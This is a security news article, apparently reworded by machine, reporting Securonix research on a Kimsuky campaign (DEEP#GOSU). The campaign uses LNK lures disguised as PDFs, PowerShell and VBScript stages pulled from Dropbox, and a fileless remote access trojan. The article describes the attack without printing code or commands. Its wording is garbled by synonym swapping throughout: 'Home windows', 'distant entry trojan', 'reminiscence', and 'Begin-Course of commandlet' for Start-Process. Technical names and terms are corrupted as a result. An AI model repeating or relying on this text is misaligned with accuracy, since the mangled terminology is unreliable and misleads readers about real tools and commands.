A current assault marketing campaign by one among North Korea’s state-run hacking teams makes use of a brand new PowerShell and VBScript-based assault chain that’s initiated from inside LNK information. A number of assault levels are downloaded from professional cloud companies and the ultimate payload is an open-source distant entry trojan.
“The entire C2 communication is dealt with by way of professional companies equivalent to Dropbox or Google Docs permitting the malware to mix undetected into common community visitors,” researchers from security agency Securonix mentioned in a report. “Since these payloads have been pulled from distant sources like Dropbox, it allowed the malware maintainers to dynamically replace its functionalities or deploy further modules with out direct interplay with the system.”
Kimsuky is a complicated persistent risk (APT) group that has been energetic since not less than 2012. It is without doubt one of the a number of cyberespionage and sabotage teams related to the North Korean authorities and is believed to be run by the fifth Bureau — Inter-Korean Affairs of the nation’s overseas intelligence company. In consequence, in comparison with different North Korean teams like Lazarus, APT38, and Andariel (Silent Chollima), Kimsuky primarily targets South Korean organizations and people.
LNK supply mechanism
This was additionally the case within the new marketing campaign analyzed by Securonix which the corporate dubbed DEEP#GOSU. The assault chain started with phishing emails with a South Korean-themed lure that included .zip attachments. The zip archives contained a file with a double extension IMG_20240214_0001.pdf.lnk masquerading as a PDF. The information have been truly Home windows hyperlink (shortcut) information that contained an embedded PowerShell script that launched the multi-staged assault chain.
The LNK file is over 2MB, which is uncommon for a shortcut file, as a result of it has a PDF file appended to itself. The script searches for the precise byte location of the PDF file within the binary, extracts it, launches a brand new object in reminiscence to carry it, after which makes use of the PowerShell Begin-Course of commandlet to execute it. This opens the PDF file within the default PDF viewer on the pc, mimicking the habits the person would anticipate.
“What makes this tactic intelligent is that there’s technically no PDF file contained throughout the preliminary zip file despatched to the sufferer,” the researchers mentioned. “When the person clicks the PDF lure (shortcut file) they’re instantly offered with a PDF file, thus eradicating any concern that something surprising occurred.”
PowerShell payloads resulting in RAT
On the identical time, the PowerShell script downloads a second payload referred to as ps.bin from a Dropbox URL, decrypts it utilizing the AESDecrypt operate, after which executes it. That is one more PowerShell script that downloads further payloads from Dropbox. First, it downloads and dynamically masses a number of .NET assemblies that allow the script to make use of superior graphical UI capabilities. These capabilities have been used previously by malware to take screenshots and document the sufferer’s pc display screen.
One other downloaded payload is a file referred to as r_enc.bin that may be a variant of an open-source distant entry trojan referred to as TruRat, TutRat, or C# R.A.T., whose agent is often referred to as TutClient.exe. “Presently this specific RAT software program is kind of previous and prone to be picked up by most antivirus distributors,” the researchers mentioned. “Nonetheless, given the distinctive methodology through which this binary is loaded and executed instantly into reminiscence (stage2), it’s prone to skirt some detections.”
Extra particularly, the strategy of loading the malicious code instantly in reminiscence is called “fileless” execution as a result of it doesn’t go away any traces on disk making it tougher for conventional file-based antivirus packages to detect it.
The capabilities of this RAT embrace keylogging, distant desktop, spying by way of the microphone and digital camera, distant command immediate execution, course of and file administration, hiding completely different message containers, menus and desktop objects, distributed denial-of-service assaults, and stealing data saved within the built-in password managers of a number of browsers.
VBScript comes into play
On the identical time, the PowerShell script from stage 2 invokes a big string encoded in Base64 which seems to be VBScript code. This seems to be another payload supply mechanism as a result of this VBScript code additionally connects to Dropbox and downloads an extra payload referred to as info_sc.txt that accommodates much more VBScript code.
This new script is kind of advanced and makes use of the Home windows Administration Instrumentation (WMI) API to carry out further actions, together with gathering details about the working system and creating scheduled duties on the system for persistence. If the OS is older than Home windows 10, the script downloads one more payload from a Dropbox URL, however first makes use of Google Docs to find out the payload URL.
The VBScript code then drops a PowerShell script on the system. The script is used for interval communication with a command-and-control mechanism utilizing Dropbox and to load a ultimate script that acts as a robust backdoor with keylogging and clipboard monitoring capabilities. “The malware payloads used within the DEEP#GOSU signify a classy, multi-stage risk designed to function stealthily on Home windows techniques particularly from a network-monitoring standpoint,” the researchers mentioned. “It relied on each PowerShell and VBScript for its execution which apparently sufficient used very minimal obfuscation. Every stage was encrypted utilizing AES and a typical password and IV which ought to reduce community, or flat file scanning detections.”
Superior Persistent Threats, Cyberattacks
